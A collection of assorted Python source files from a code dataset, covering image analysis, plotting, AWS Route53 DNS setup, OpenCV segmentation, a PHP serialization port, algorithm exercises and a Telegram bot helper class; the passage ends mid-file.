+{"seq_id":"556792122","text":"import numpy as np\nimport scipy.ndimage as ndimage\nimport scipy.optimize as opt\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\nimport xarray\n\nclass Operations(object):\n\n    def __init__(self):\n        pass\n\n    @staticmethod\n    def get_com(center_data):\n        # derived from http://stackoverflow.com/questions/18435003/ndimages-center-of-mass-to-calculate-the-position-of-a-gaussian-peak\n        # gets a guess for the center of mass\n        hist, bins = np.histogram(center_data.ravel(), normed=False, bins=49000)\n        threshold = bins[np.cumsum(bins) * (bins[1] - bins[0]) > 30000][0]\n        mnorm2d = np.ma.masked_less(center_data, threshold)\n        com = ndimage.measurements.center_of_mass(mnorm2d)\n        com = [float(i) for i in com]\n        com = ndimage.measurements.center_of_mass(center_data)\n        com = [float(i) for i in com]\n        return com\n\n    @staticmethod\n    def calculate_sensitivity(flood_data, min_sensitivity, max_sensitivity):\n        if min_sensitivity is None and max_sensitivity is None:\n            num_pixels = flood_data.shape[0]*flood_data.shape[1]\n            efficiency = flood_data/((1/num_pixels)*np.sum(flood_data))\n        else:\n            flood_data = np.ma.masked_outside(flood_data, min_sensitivity,\n                                              max_sensitivity)\n            num_pixels = flood_data.shape[0]*flood_data.shape[1]\n            efficiency = flood_data/((1/num_pixels)*np.sum(flood_data))\n        return efficiency\n\n    @staticmethod\n    def correct_for_sensitivity(sample, flood_data, dark_current, min_sensitivity, max_sensitivity):\n        if dark_current is not None:\n            sample = sample - dark_current\n            flood_data = flood_data - dark_current\n        sensitivity = np.array(Operations.calculate_sensitivity(flood_data, min_sensitivity, max_sensitivity))\n        new_sample = sample / sensitivity\n        return new_sample\n\n    @staticmethod\n    def max_com(center_data):\n        # finds center of mass by searching for the maximum position\n        com = np.unravel_index(center_data.argmax(), center_data.shape)\n        # com = np.unravel_index(center_data.values.argmax(), center_data.values.shape)\n        # com_x = center_data.coords['x'].values[com[1]]\n        # com_y = center_data.coords['y'].values[com[0]]\n        # return com_x, com_y\n        return com\n\n    @staticmethod\n    def find_center(center_data, size, translation):\n        # finds the actual center of mass via Gaussian fitting\n        data = center_data.values\n        pixel_size_x, pixel_size_y = size\n        x = np.linspace(0, 255, 256)\n        y = np.linspace(0, 255, 256)\n        x, y = np.meshgrid(x, y)\n\n        data = Operations.pad_to_square(data)\n        com = Operations.get_com(data)\n        initial_guess = (300, com[1], com[0], 4, 4, 0, 0)\n        popt, pcov = opt.curve_fit(Operations.twoD_Gaussian, (x, y), data.ravel(), p0 = initial_guess)\n\n        x_diff = (popt[1] - int(round(popt[1])))*pixel_size_x\n        y_diff = (popt[2] - int(round(popt[2])))* pixel_size_y + translation\n        center_x = center_data.coords['x'].values[int(round(popt[1]))] + x_diff\n        center_y = center_data.coords['y'].values[int(round(popt[2]))] + y_diff\n\n        return center_x, center_y, popt[1]*pixel_size_x, popt[2]*pixel_size_y\n\n    @staticmethod\n    def integrate(size, center, data): # Does the radial integration\n        # derived from http://stackoverflow.com/questions/21242011/most-efficient-way-to-calculate-radial-profile\n        y, x = np.indices((data.values.shape))\n        pixel_size_x, pixel_size_y = size\n        y = pixel_size_y*y\n        x = pixel_size_x*x\n        r = np.sqrt((x - center[0])**2 + (y - center[1])**2)\n        r = r.astype(np.int)\n\n        tbin = np.bincount(r.ravel(), data.values.ravel())\n        nr = np.bincount(r.ravel())\n        radialprofile = tbin / nr\n        return radialprofile\n\n    @staticmethod\n    def get_axes_units(data_shape, pixel_size):\n        # Recenters the 2d graph\n        \"\"\"\n        pixel_size in mm\n        get default units with the center as the center of the image\n        \"\"\"\n        i_center = data_shape[1]/2\n        j_center = data_shape[0]/2\n        x_axis_units = (np.arange(data_shape[1])-i_center) * pixel_size[1]\n        y_axis_units = (np.arange(data_shape[0])-j_center) * pixel_size[0]\n        return x_axis_units, y_axis_units\n\n    @staticmethod\n    def twoD_Gaussian(xdata_tuple, amplitude, xo, yo, sigma_x, sigma_y, theta, offset):\n        # model for the 2d Gaussian\n        # from http://stackoverflow.com/questions/21566379/fitting-a-2d-gaussian-function-using-scipy-optimize-curve-fit-valueerror-and-m\n        (x, y) = xdata_tuple\n        a = (np.cos(theta)**2)/(2*sigma_x**2) + (np.sin(theta)**2)/(2*sigma_y**2)\n        b = -(np.sin(2*theta))/(4*sigma_x**2) + (np.sin(2*theta))/(4*sigma_y**2)\n        c = (np.sin(theta)**2)/(2*sigma_x**2) + (np.cos(theta)**2)/(2*sigma_y**2)\n        g = offset + amplitude*np.exp(- (a*((x-xo)**2) + 2*b*(x-xo)*(y-yo) +\n                                        c*((y-yo)**2)))\n        return g.ravel()
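\n\n    # (Editorial note) a, b and c above are the coefficients of the rotated\n    # quadratic form; with theta = 0 this reduces to the familiar axis-aligned\n    # Gaussian exp(-((x-xo)**2/(2*sigma_x**2) + (y-yo)**2/(2*sigma_y**2))).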
\n    @staticmethod\n    def pad_to_square(a, pad_value=0):\n        # from http://stackoverflow.com/questions/10871220/making-a-matrix-square-and-padding-it-with-desired-value-in-numpy\n        m = a.reshape((a.shape[0], -1))\n        padded = pad_value * np.ones(2 * [max(m.shape)], dtype=m.dtype)\n        padded[0:m.shape[0], 0:m.shape[1]] = m\n        return padded\n\n\ndef main():\n    pass\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"Operations.py","file_name":"Operations.py","file_ext":"py","file_size_in_byte":5528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"612226185","text":"# !/usr/bin/python\n# -*- coding:utf-8\n# author: lvxiao\n# create time:2017-04-25\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nplt.figure(1) # create the figure object\nplt.title(\"single variable\") # figure title\nplt.xlabel('x')\nplt.ylabel('y')\nplt.axis([0, 5,0, 10]) # x axis range 0-5, y axis range 0-10\nplt.grid(True) # draw a grid\nxx = np.linspace(0, 5, 10) # generate 10 points between 0 and 5\nplt.plot(xx, 2 * xx, 'g-')\nplt.show()\n\nplt.figure(2) # create the figure object\nplt.title(\"single variable\") # figure title\nplt.xlabel('x')\nplt.ylabel('y')\nplt.axis([-12, 12,-1, 1]) # x axis range -12 to 12, y axis range -1 to 1\nplt.grid(True) # draw a grid\nxx = np.linspace(-12, 12, 100) # generate 100 points between -12 and 12\nplt.plot(xx, np.sin(xx), 'g-', label=\"$sin(x)$\")\nplt.plot(xx, np.cos(xx), 'r--', label=\"$cos(x)$\")\nplt.legend()\nplt.show()\n","sub_path":"src/test/python/matplotlib/matplot1.py","file_name":"matplot1.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"520482976","text":"import boto3\n\nclient = boto3.client('route53')\nresponse = client.change_resource_record_sets(\n    ChangeBatch={\n        'Changes': [\n            {\n                'Action': 'CREATE',\n                'ResourceRecordSet': {\n                    'Name': 'testwebserver02.hands-on.cloud',\n                    'ResourceRecords': [\n                        {\n                            'Value': '3.128.188.18',\n                        },\n                    ],\n                    'TTL': 60,\n                    'Type': 'A',\n                },\n            },\n        ],\n        'Comment': 'Web Server',\n    },\n    HostedZoneId='Z00594533FY3S68ROG6V2',\n)\nprint(response)","sub_path":"route53-create-dns-record.py","file_name":"route53-create-dns-record.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"434220283","text":"# coding=utf-8\nimport csv\n\"\"\"\n\nPROBLEM 022 - Name Scores\n\nWritten by: Yuanjie Li\nDate: Oct 24, 2017\n\nUsing names.txt (right click and 'Save Link/Target As...'), a 46K text\nfile containing over five-thousand first names, begin by sorting it into\nalphabetical order. Then working out the alphabetical value for each name,\nmultiply this value by its alphabetical position in the list to obtain a\nname score.\n\nFor example, when the list is sorted into alphabetical order, COLIN, which\nis worth 3 + 15 + 12 + 9 + 14 = 53, is the 938th name in the list. 
So,\nCOLIN would obtain a score of 938 × 53 = 49714.\n\nWhat is the total of all the name scores in the file?\n\n\"\"\"\n\ndef main():\n\n namePath = \"p022_names.txt\"\n names = []\n output = 0\n\n # CSV read\n with open(namePath) as f:\n reader = csv.reader(f)\n for row in reader:\n for name in row:\n names.append(name)\n\n # Python sort\n names = sorted(names)\n\n # Expression to go from ascii to int :\n # ord('A') - 0x40\n\n for i in xrange(len(names)):\n output += (i+1) * sum([ord(x) - 0x40 for x in names[i]])\n print(output)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"p022/name_sum.py","file_name":"name_sum.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"495999570","text":"import sys\n\ncase = int(sys.stdin.readline())\nn = []\nfor i in range(case):\n x, y = map(int, sys.stdin.readline().split(' '))\n n.append((x, y))\n\ndef merge(n):\n if len(n) < 2:\n return n\n \n mid = len(n)//2\n left = merge(n[:mid])\n right = merge(n[mid:])\n\n merged = []\n l = r = 0\n while l < len(left) and r < len(right):\n if left[l][1] < right[r][1]:\n merged.append(left[l])\n l += 1\n elif (left[l][1] == right[r][1]) and (left[l][0] < right[r][0]):\n merged.append(left[l])\n l += 1\n elif (left[l][1] == right[r][1]) and (left[l][0] > right[r][0]):\n merged.append(right[r])\n r += 1\n else:\n merged.append(right[r])\n r += 1\n merged += left[l:]\n merged += right[r:]\n return merged\n\nn = merge(n)\nfor t in n:\n print(t[0], t[1])","sub_path":"기초/11651.py","file_name":"11651.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"75419762","text":"\"\"\"\n @Time : 2021/4/20 16:55\n @Author : Monlter\n @FileName: allmethods.py\n @Software: PyCharm\n\"\"\"\nimport matplotlib.pyplot as plt\nfrom scipy import ndimage as ndi\nfrom skimage import morphology, color, data, filters,segmentation\nimport numpy as np\nimport cv2\nimport time\n\n\ndrawing = False\nmode = False\n\n\ndef cv_show(name, img):\n cv2.namedWindow(name, 0)\n cv2.resizeWindow(name, 640, 640)\n cv2.imshow(name, img)\n cv2.waitKey()\n cv2.destroyAllWindows()\n\n\ndef iterThresh(img_gray):\n img_gray = np.array(img_gray)\n zmax = np.max(img_gray)\n zmin = np.min(img_gray)\n ith_old = 0\n ith_new = (zmax + zmin) / 2\n while ith_old != ith_new:\n zo = np.mean(img_gray[np.where(img_gray > ith_new)])\n zb = np.mean(img_gray[np.where(img_gray < ith_new)])\n ith_old = ith_new\n ith_new = (zo + zb) / 2\n print(\"old:\",ith_old,\"new:\",ith_new)\n print('iter th:', ith_new)\n\n return ith_new\n\n\ndef threshSegImg(img_gray, thresh):\n img_bool = img_gray > thresh\n img_gray = np.array(img_gray)\n img_gray[img_bool] = 255\n img_gray[~img_bool] = 0\n return img_gray\n\n\ndef delete_contours(contours, delete_list):\n delta = 0\n for i in range(len(delete_list)):\n # print(\"i= \", i)\n del contours[delete_list[i] - delta]\n delta = delta + 1\n return contours\n\n\ndef extract_oil(img):\n hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n lower_hsv = np.array([35, 43, 46])\n upper_hsv = np.array([77, 255, 255])\n mask = cv2.inRange(hsv_img, lowerb=lower_hsv, upperb=upper_hsv)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))\n dst = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)\n return dst\n\n\ndef calculate_oleaginousness(ori_img, seg_img):\n num_all = len(ori_img[ori_img == 255])\n num_oil = len(seg_img[seg_img == 255])\n return 
num_oil/num_all\n\n\nclass GrabCut:\n    def __init__(self, t_img):\n        self.img = t_img\n        self.img_raw = self.img.copy()\n        self.img_width = self.img.shape[0]\n        self.img_height = self.img.shape[1]\n        # self.scale_size = 640 * self.img_width // self.img_height\n        # if self.img_width > 640:\n        #     self.img = cv2.resize(self.img, (640, self.scale_size), interpolation=cv2.INTER_AREA)\n        self.img_show = self.img.copy()\n        self.img_gc = self.img.copy()\n        self.img_gc = cv2.GaussianBlur(self.img_gc, (3, 3), 0)\n        self.lb_up = False\n        self.rb_up = False\n        self.lb_down = False\n        self.rb_down = False\n        self.mask = np.full(self.img.shape[:2], 2, dtype=np.uint8)\n        self.first_choose = True\n\ndef re_max_area(mask):\n    contours, hierarchy = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n\n    # hierarchy[i]: [Next,Previous,First_Child,Parent]\n    # keep only contours without a parent contour\n    delete_list = []\n    c, row, col = hierarchy.shape\n    for i in range(row):\n        if hierarchy[0, i, 2] > 0 or hierarchy[0, i, 3] > 0: # has a parent or child contour\n            pass\n        else:\n            delete_list.append(i)\n\n    # delete the contours that do not qualify, by list index\n    contours = delet_contours(contours, delete_list)\n    temp = np.ones(mask.shape, dtype=np.uint8) * 255\n    result = cv2.drawContours(temp, contours, -1, (0, 0, 0), 2)\n    area = []\n\n    # find the largest contour\n    for k in range(len(contours)):\n        area.append(cv2.contourArea(contours[k]))\n    max_idx = np.argmax(np.array(area))\n\n    # fill the largest contour\n    mask = cv2.drawContours(result, contours, max_idx, 0, cv2.FILLED)\n    out_mask = np.ones(mask.shape, dtype=np.uint8) * 255\n    out_mask[mask == 255] = 0\n    return out_mask\n\ndef delet_contours(contours, delete_list):\n    delta = 0\n    for i in range(len(delete_list)):\n        # print(\"i= \", i)\n        del contours[delete_list[i] - delta]\n        delta = delta + 1\n    return contours\n\n# mouse callback function\ndef mouse_event2(event, x, y, flags, param):\n    global drawing, last_point, start_point\n    # left button down: start drawing\n    if event == cv2.EVENT_LBUTTONDOWN:\n        drawing = True\n        last_point = (x, y)\n        start_point = last_point\n        param.lb_down = True\n        print('mouse lb down')\n    elif event == cv2.EVENT_RBUTTONDOWN:\n        drawing = True\n        last_point = (x, y)\n        start_point = last_point\n        param.rb_down = True\n        print('mouse rb down')\n    # mouse moved: draw\n    elif event == cv2.EVENT_MOUSEMOVE:\n        if drawing:\n            if param.lb_down:\n                cv2.line(param.img_show, last_point, (x, y), (0, 0, 255), 2, -1)\n                cv2.rectangle(param.mask, last_point, (x, y), 1, -1, 4)\n            else:\n                cv2.line(param.img_show, last_point, (x, y), (255, 0, 0), 2, -1)\n                cv2.rectangle(param.mask, last_point, (x, y), 0, -1, 4)\n            last_point = (x, y)\n    # left button released: stop drawing\n    elif event == cv2.EVENT_LBUTTONUP:\n        drawing = False\n        param.lb_up = True\n        param.lb_down = False\n        cv2.line(param.img_show, last_point, (x, y), (0, 0, 255), 2, -1)\n        if param.first_choose:\n            param.first_choose = False\n            cv2.rectangle(param.mask, last_point, (x, y), 1, -1, 4)\n        print('mouse lb up')\n    elif event == cv2.EVENT_RBUTTONUP:\n        drawing = False\n        param.rb_up = True\n        param.rb_down = False\n        cv2.line(param.img_show, last_point, (x, y), (255, 0, 0), 2, -1)\n        if param.first_choose:\n            param.first_choose = False\n            param.mask = np.full(param.img.shape[:2], 3, dtype=np.uint8)\n            cv2.rectangle(param.mask, last_point, (x, y), 0, -1, 4)\n        print('mouse rb up')
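\n\n# (Editorial note) In the mask passed to cv2.grabCut, 0 = sure background,\n# 1 = sure foreground, 2 = probable background, 3 = probable foreground;\n# above, the left button paints foreground and the right button background.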
\n\ndef watershed(img):\n    image = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n    denoised = filters.rank.median(image, morphology.disk(3)) # filter out noise\n\n    # use gradient values below 12 as start markers\n    markers = filters.rank.gradient(denoised, morphology.disk(6)) < 12\n    markers = ndi.label(markers)[0]\n\n    gradient = filters.rank.gradient(denoised, morphology.disk(5)) # compute the gradient\n\n    labels = segmentation.watershed(gradient, markers, mask=image) # gradient-based watershed\n\n    labels = labels.astype(np.uint8)\n    ret, thresh = cv2.threshold(labels, 20, 225, cv2.THRESH_BINARY)\n    contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n\n    # hierarchy[i]: [Next,Previous,First_Child,Parent]\n    # keep only contours without a parent contour\n    delete_list = []\n    c, row, col = hierarchy.shape\n    for i in range(row):\n        if hierarchy[0, i, 2] > 0 or hierarchy[0, i, 3] > 0: # has a parent or child contour\n            pass\n        else:\n            delete_list.append(i)\n\n    # delete the contours that do not qualify, by list index\n    contours = delet_contours(contours, delete_list)\n    temp = np.ones(thresh.shape, dtype=np.uint8) * 255\n    result = cv2.drawContours(temp, contours, -1, (0, 0, 0), 2)\n    area = []\n\n    # find the largest contour\n    for k in range(len(contours)):\n        area.append(cv2.contourArea(contours[k]))\n    max_idx = np.argmax(np.array(area))\n\n    # fill the largest contour\n    mask = cv2.drawContours(result, contours, max_idx, 0, cv2.FILLED)\n    out_mask = np.ones(mask.shape, dtype=np.uint8) * 255\n    out_mask[mask == 255] = 0\n    return out_mask\n\n\n\ndef thresh_grabcut(img):\n    old_img = img.copy()\n    out_img = img.copy()\n    # enhance the contrast of the image\n    img_bright = cv2.convertScaleAbs(img, alpha=2, beta=0)\n    # build the mask\n    img_bright_gray = cv2.cvtColor(img_bright, cv2.COLOR_BGR2GRAY)\n    ret, mask = cv2.threshold(img_bright_gray, 30, 255, cv2.THRESH_BINARY_INV)\n    mask[mask == 255] = 1\n    mask[mask == 0] = 2\n\n    # create bgdModel, fgdModel\n    size = (1, 65)\n    bgdModel = np.zeros(size, np.float64)\n    fgdModel = np.zeros(size, np.float64)\n    # build the rect\n    rect = (1, 1, img.shape[1], img.shape[0])\n\n    # cv2.grabCut\n    cv2.grabCut(img, mask, rect, bgdModel, fgdModel, 20, cv2.GC_INIT_WITH_MASK)\n    mask = np.where((mask == 2) | (mask == 0), 0, 1).astype('uint8')\n    out_img *= mask[:, :, np.newaxis]\n    mask1 = np.where((mask == 1), 255, 0).astype(\"uint8\")\n    out_mask = re_max_area(mask1)\n    return out_mask\n\n\ndef mouse_grabcut(img):\n    g_img = GrabCut(img)\n    cv2.namedWindow('image')\n    # register the mouse callback\n    cv2.setMouseCallback('image', mouse_event2, g_img)\n    while (True):\n        cv2.imshow('image', g_img.img_show)\n        if g_img.lb_up or g_img.rb_up:\n            g_img.lb_up = False\n            g_img.rb_up = False\n            start = time.process_time()\n            bgdModel = np.zeros((1, 65), np.float64)\n            fgdModel = np.zeros((1, 65), np.float64)\n\n            rect = (1, 1, g_img.img.shape[1], g_img.img.shape[0])\n            print(g_img.mask)\n            mask = g_img.mask\n            g_img.img_gc = g_img.img.copy()\n            cv2.grabCut(g_img.img_gc, mask, rect, bgdModel, fgdModel, 5, cv2.GC_INIT_WITH_MASK)\n            elapsed = (time.process_time() - start)\n            mask2 = np.where((mask == 2) | (mask == 0), 0, 1).astype('uint8') # 0 and 2 are background\n            g_img.img_gc = g_img.img_gc * mask2[:, :, np.newaxis] # use the mask to extract the foreground\n            cv2.imshow('result', g_img.img_gc)\n            mask1 = np.where((mask2 == 1), 0, 255).astype('uint8')\n            out_mask = re_max_area(mask1)\n        # press ESC to exit\n        if cv2.waitKey(20) == 27:\n            return out_mask
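\n\n\n# Editorial usage sketch ('rock.jpg' is a hypothetical input image):\nif __name__ == '__main__':\n    sample = cv2.imread('rock.jpg')\n    rock_mask = thresh_grabcut(sample)\n    cv_show('mask', rock_mask)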
\n\n\n","sub_path":"rock segmentation and oil extraction/tools/allmethods.py","file_name":"allmethods.py","file_ext":"py","file_size_in_byte":9432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"612226185","text":"# -*- encoding: utf-8 -*-\n\"\"\"\ncleanexcel.py\nCreated on 2018/8/21 13:36\nCopyright (c) 2018/8/21, \n@author: 马家树 (majstx@163.com)\n\"\"\"\nimport openpyxl\nfrom utils import myutil\nimport xlsxwriter\nfrom utils.myutil import *\n\n\"\"\"\nRemove invisible characters according to the rules\n\"\"\"\n\n\ndef main(inpath, outpath):\n\n    # read\n    wbr = openpyxl.load_workbook(inpath, read_only=True)\n\n    # write\n    workbook = xlsxwriter.Workbook(filename=outpath)\n    workbook.use_zip64()\n    sheet = workbook.add_worksheet()\n\n    rows = wbr.active.rows\n    for row_num, row in enumerate(rows):\n        printlog('Processing row {0}'.format(row_num))\n        for col_num, cell in enumerate(row):\n            val = cell.value\n            val = myutil.str_formatxm(val)\n            sheet.write(row_num, col_num, val)\n    printlog('Saving ...')\n    workbook.close()\n    printlog('Saved successfully')\n\n\nif __name__ == '__main__':\n    import sys\n    # main() needs the input and output paths; read them from the command line\n    main(sys.argv[1], sys.argv[2])\n\n","sub_path":"file_clean/test/cleanexcelrow.py","file_name":"cleanexcelrow.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"107477270","text":"import codecs\ntry:\n    codecs.lookup_error('surrogateescape')\n    default_errors = 'surrogateescape'\nexcept LookupError:\n    default_errors = 'strict'\n\ntry:\n    from StringIO import StringIO as BytesIO\nexcept ImportError:\n    from io import BytesIO as BytesIO\n\ntry:\n    unicode\nexcept NameError:\n    # Python 3\n    unicode = str\n    basestring = (bytes, str)\n\ntry:\n    long\nexcept NameError:\n    # Python 3\n    long = int\n\ntry:\n    xrange\nexcept NameError:\n    xrange = range\n\n__author__ = 'Armin Ronacher <armin.ronacher@active-4.com>'\n__version__ = '1.3'\n__all__ = ('phpobject', 'convert_member_dict','load', 'loads', 'dump', 'dumps', 'serialize', 'unserialize')\n\n\ndef _translate_member_name(name):\n    if name[:1] == ' ':\n        name = name.split(None, 2)[-1]\n    return name\n\n\nclass phpobject(object):\n    __slots__ = ('__name__', '__php_vars__')\n\n    def __init__(self, name, d=None):\n        if d is None:\n            d = {}\n        object.__setattr__(self, '__name__', name)\n        object.__setattr__(self, '__php_vars__', d)\n\n    def _asdict(self):\n        return convert_member_dict(self.__php_vars__)\n\n    def _lookup_php_var(self, name):\n        for key, value in self.__php_vars__.items():\n            if _translate_member_name(key) == name:\n                return key, value\n\n    def __getattr__(self, name):\n        rv = self._lookup_php_var(name)\n        if rv is not None:\n            return rv[1]\n        raise AttributeError(name)\n\n    def __setattr__(self, name, value):\n        rv = self._lookup_php_var(name)\n        if rv is not None:\n            name = rv[0]\n        self.__php_vars__[name] = value\n\n    def __repr__(self):\n        return '<phpobject %r>' % (self.__name__,)\n\n\ndef convert_member_dict(d):\n    return dict((_translate_member_name(k), v) for k, v in d.items())\n\n\ndef dumps(data, charset='utf-8', errors=default_errors, object_hook=None):\n    def _serialize(obj, keypos):\n        if keypos:\n            if isinstance(obj, (int, long, float, bool)):\n                return ('i:%i;' % obj).encode('latin1')\n            if isinstance(obj, basestring):\n                encoded_obj = obj\n                if isinstance(obj, unicode):\n                    encoded_obj = obj.encode(charset, errors)\n                s = BytesIO()\n                s.write(b's:')\n                s.write(str(len(encoded_obj)).encode('latin1'))\n                s.write(b':\"')\n                s.write(encoded_obj)\n                s.write(b'\";')\n                return s.getvalue()\n            if obj is None:\n                return b's:0:\"\";'\n            raise TypeError('can\\'t serialize %r as key' % type(obj))\n        else:\n            if obj is None:\n                return b'N;'\n            if isinstance(obj, bool):\n                return ('b:%i;' % obj).encode('latin1')\n            if isinstance(obj, (int, long)):\n                return ('i:%s;' % obj).encode('latin1')\n            if isinstance(obj, float):\n                return ('d:%s;' % obj).encode('latin1')\n            if isinstance(obj, basestring):\n                encoded_obj = obj\n                if isinstance(obj, unicode):\n                    encoded_obj = obj.encode(charset, errors)\n                s = BytesIO()\n                s.write(b's:')\n                s.write(str(len(encoded_obj)).encode('latin1'))\n                s.write(b':\"')\n                s.write(encoded_obj)\n                s.write(b'\";')\n                return s.getvalue()\n            if isinstance(obj, (list, tuple, dict)):\n                out = []\n                if isinstance(obj, dict):\n                    iterable = obj.items()\n                else:\n                    iterable = enumerate(obj)\n                for key, value in 
iterable:\n                    out.append(_serialize(key, True))\n                    out.append(_serialize(value, False))\n                return b''.join([\n                    b'a:',\n                    str(len(obj)).encode('latin1'),\n                    b':{',\n                    b''.join(out),\n                    b'}'\n                ])\n            if isinstance(obj, phpobject):\n                return b'O' + _serialize(obj.__name__, True)[1:-1] + \\\n                       _serialize(obj.__php_vars__, False)[1:]\n            if object_hook is not None:\n                return _serialize(object_hook(obj), False)\n            raise TypeError('can\\'t serialize %r' % type(obj))\n\n    return _serialize(data, False)\n\n\ndef load(fp, charset='utf-8', errors=default_errors, decode_strings=False,\n         object_hook=None, array_hook=None):\n    if array_hook is None:\n        array_hook = dict\n\n    def _expect(e):\n        v = fp.read(len(e))\n        if v != e:\n            raise ValueError('failed expectation, expected %r got %r' % (e, v))\n\n    def _read_until(delim):\n        buf = []\n        while 1:\n            char = fp.read(1)\n            if char == delim:\n                break\n            elif not char:\n                raise ValueError('unexpected end of stream')\n            buf.append(char)\n        return b''.join(buf)\n\n    def _load_array():\n        items = int(_read_until(b':')) * 2\n        _expect(b'{')\n        result = []\n        last_item = Ellipsis\n        for idx in xrange(items):\n            item = _unserialize()\n            if last_item is Ellipsis:\n                last_item = item\n            else:\n                result.append((last_item, item))\n                last_item = Ellipsis\n        _expect(b'}')\n        return result\n\n    def _unserialize():\n        type_ = fp.read(1).lower()\n        if type_ == b'n':\n            _expect(b';')\n            return None\n        if type_ in b'idb':\n            _expect(b':')\n            data = _read_until(b';')\n            if type_ == b'i':\n                return int(data)\n            if type_ == b'd':\n                return float(data)\n            return int(data) != 0\n        if type_ == b's':\n            _expect(b':')\n            length = int(_read_until(b':'))\n            _expect(b'\"')\n            data = fp.read(length)\n            _expect(b'\"')\n            if decode_strings:\n                data = data.decode(charset, errors)\n            _expect(b';')\n            return data\n        if type_ == b'a':\n            _expect(b':')\n            return array_hook(_load_array())\n        if type_ == b'o':\n            if object_hook is None:\n                raise ValueError('object in serialization dump but '\n                                 'object_hook not given.')\n            _expect(b':')\n            name_length = int(_read_until(b':'))\n            _expect(b'\"')\n            name = fp.read(name_length)\n            _expect(b'\":')\n            if decode_strings:\n                name = name.decode(charset, errors)\n            return object_hook(name, dict(_load_array()))\n        raise ValueError('unexpected opcode')\n\n    return _unserialize()\n\n\ndef loads(data, charset='utf-8', errors=default_errors, decode_strings=False,\n          object_hook=None, array_hook=None):\n    return load(BytesIO(data), charset, errors, decode_strings,\n                object_hook, array_hook)\n\n\ndef dump(data, fp, charset='utf-8', errors=default_errors, object_hook=None):\n    fp.write(dumps(data, charset, errors, object_hook))\n\nserialize = dumps\nunserialize = loads
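\n\n# Editorial usage sketch:\nif __name__ == '__main__':\n    blob = dumps({'foo': 42})\n    print(blob)                              # b'a:1:{s:3:\"foo\";i:42;}'\n    print(loads(blob, decode_strings=True))  # {'foo': 42}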
\n","sub_path":"satlib/TCP/functions/serialize.py","file_name":"serialize.py","file_ext":"py","file_size_in_byte":7225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"226635724","text":"'''\nYou have a plane with lots of rectangles on it; find out how many connected groups of intersecting rectangles there are.\n\nLeetcode #323 Number of Connected Components in an Undirected Graph\n'''\nimport unittest\n\n# Time:\n# Space:\n# rectangle: bottom-left and top-right points\ndef count_intersection(rectangles):\n    def do_intersect(r1, r2):\n        return r1[0][0] <= r2[1][0] and r1[1][0] >= r2[0][0] \\\n               and r1[0][1] <= r2[1][1] and r1[1][1] >= r2[0][1]\n\n    def find(i):\n        if i != parents[i]:\n            parents[i] = find(parents[i])\n        return parents[i]\n\n    rectangles.sort()\n    parents = [i for i in range(len(rectangles))]\n    for i in range(len(rectangles)):\n        for j in range(i+1, len(rectangles)):\n            if do_intersect(rectangles[i], rectangles[j]):\n                p1, p2 = find(i), find(j)\n                if p1 != p2:\n                    parents[p2] = p1\n                    parents[j] = p1\n            if rectangles[j][0][0] > rectangles[i][1][0]: break\n    return len([i for i, v in enumerate(parents) if i == v])\n\n\nclass Test(unittest.TestCase):\n    data = [(\n        [\n            [[0, 0], [2, 2]],\n            [[1, 1], [4, 3]],\n            [[6, 0], [8, 2]]\n        ], 2)]\n\n    def test_method(self):\n        for rects, expected in self.data:\n            actual = count_intersection(rects)\n            self.assertEqual(actual, expected)\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"airbnb/numberOfIntersectedRectangles.py","file_name":"numberOfIntersectedRectangles.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"71493245","text":"import json\nimport logging\nimport os\nimport pickle\nimport random\nimport re\nimport string\n\nimport requests\n\n\nclass BotHandler:\n    def __init__(self, token):\n        self.token = token\n        self.api_url = \"https://api.telegram.org/bot{}/\".format(token)\n\n    def get_updates(self, offset=None, timeout=100):\n        method = 'getUpdates'\n        params = {'timeout': timeout, 'offset': offset}\n        resp = requests.get(self.api_url + method, params)\n        if resp.json().__contains__('result'):\n            result_json = resp.json()['result']\n            return result_json\n        else:\n            logging.critical(\"Response error \" + resp.json().__str__())\n            print(\"Response error \" + resp.json().__str__())\n            self.delete_webhook()\n\n    def get_last_update(self):\n        get_result = self.get_updates()\n\n        if len(get_result) > 0:\n            last_update = get_result[-1]\n        else:\n            # get_result is empty here, so there is nothing to index\n            print('last_update index out of range')\n            last_update = ''\n        return last_update\n\n    def send_message(self, chat_id, text):\n        params = {'chat_id': chat_id, 'text': text}\n        method = 'sendMessage'\n        resp = requests.post(self.api_url + method, params)\n        return resp\n\n    def kick(self, chat_id, user_id):\n        method = 'kickChatMember'\n        params = {'chat_id': chat_id, 'user_id': user_id}\n        resp = requests.get(self.api_url + method, params)\n        print('kicked:', resp)\n\n    def send_photo(self, chat_id, photo):\n        method = 'sendPhoto'\n        params = {'chat_id': chat_id, 'photo': photo}\n        resp = 